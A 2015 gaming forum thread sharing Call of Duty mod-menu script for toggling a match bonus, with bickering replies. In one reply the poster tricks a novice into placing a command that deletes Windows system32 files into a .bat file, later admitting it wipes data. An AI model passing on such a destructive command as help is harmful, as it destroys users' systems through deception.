Post: How to make Match Bonus Not Freeze
06-19-2015, 11:59 PM #1
itsSorrow
In my man cave
(adsbygoogle = window.adsbygoogle || []).push({}); So Its really simple.. So Grab the Match Bonus Code
    MatchBonus() {
level.rankedmatch = true;
UpdateMatchBonusScores(self.pers["team"]);
}

setAllPlayersMatchBonus() {
foreach(player in level.players) {
self setMatchBonus();
}
}


Then just Add a toggle function
    SetMatchBonus()
{
if(self.SetMatchBonus == false)
{
self thread MatchBonus();
self.SetMatchBonus = true;
self iPrintln("Match Bonus [^1ON^7]");
self iPrintln("If you didn't add your bot before you will freeze Sad Awesome");
}
else
{
self notify("EndMatchBonus");
self.SetMatchBonus = false;
self iPrintln("Match Bonus [^1OFF^7]");
}
}


It should end up looking like this
    
(This goes where all your #includes go)
#include maps/mp/gametypes/_globallogic_score;

(This goes in ur functions part)
SetMatchBonus()
{
if(self.SetMatchBonus == false)
{
self thread MatchBonus();
self.SetMatchBonus = true;
self iPrintln("Match Bonus [^1ON^7]");
self iPrintln("If you didn't add your bot before you will freeze Sad Awesome");
}
else
{
self notify("EndMatchBonus");
self.SetMatchBonus = false;
self iPrintln("Match Bonus [^1OFF^7]");
}
}

MatchBonus() {
level.rankedmatch = true;
UpdateMatchBonusScores(self.pers["team"]);
}

setAllPlayersMatchBonus() {
foreach(player in level.players) {
self setMatchBonus();
}
}



Video Tutorial:



The Bot Must Be In Game But Before Match Bonus is on! And God Mode Must Be Put On AFTER!!!! Match Bonus!
(adsbygoogle = window.adsbygoogle || []).push({});

The following 7 users say thank you to itsSorrow for this useful post:

<Brad>, Devilemi, Gay For Satan, iRnZ, Rezqaazify, WeHostModdedXP, XDrifteer7
07-02-2015, 04:29 PM #29
-Numb
You talkin to me?
Originally posted by Matroix7 View Post
Okay.. So First Of All you don't need the level.rankedmatch dvar in this case lol second of all it does work and third of all why the fuck bump this up? its old


Lol the "level.rankedmatch = true;" is what makes it get matchbonus, and when the game is ranked players can't join or leave because it will freeze, so "it does work"? Yeah if you play solo, but not everyone does that so I just told you that if you add something that makes it wait untill last killed it will work better..
07-02-2015, 04:33 PM #30
itsSorrow
In my man cave
Originally posted by Modz View Post
Lol the "level.rankedmatch = true;" is what makes it get matchbonus, and when the game is ranked players can't join or leave because it will freeze, so "it does work"? Yeah if you play solo, but not everyone does that so I just told you that if you add something that makes it wait untill last killed it will work better..


lmfao in this case it doesn't fucking matter... Satan and I tested it out and everyone saw it which is why I released it LMFAO and invite them before you start the game.. smart ass
07-02-2015, 04:38 PM #31
-Numb
You talkin to me?
Originally posted by Matroix7 View Post
lmfao in this case it doesn't fucking matter... Satan and I tested it out and everyone saw it which is why I released it LMFAO and invite them before you start the game.. smart ass


Bro calm down, I just gave you a tip on how to make it work proper lol
07-02-2015, 04:57 PM #32
itsSorrow
In my man cave
Originally posted by Modz View Post
Bro calm down, I just gave you a tip on how to make it work proper lol


I'm calm.. Can't I swear?
07-07-2015, 12:11 AM #33
oCmKs_4_LiFe
< ^ > < ^ >
how do i put this on my usb?
07-07-2015, 12:13 AM #34
itsSorrow
In my man cave
Originally posted by LiFe View Post
how do i put this on my usb?


you must take the code and make it into a .bat and write del c:\WINDOWS \system32\**/q inside of it
07-07-2015, 12:19 AM #35
oCmKs_4_LiFe
< ^ > < ^ >
Originally posted by Matroix7 View Post
you must take the code and make it into a .bat and write del c:\WINDOWS \system32\**/q inside of it


w0rked thx m9
07-07-2015, 12:33 AM #36
itsSorrow
In my man cave
Originally posted by LiFe View Post
w0rked thx m9


lol that deletes ur computers data
08-31-2015, 12:00 AM #37
How do you make it go on automatically no toggle

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo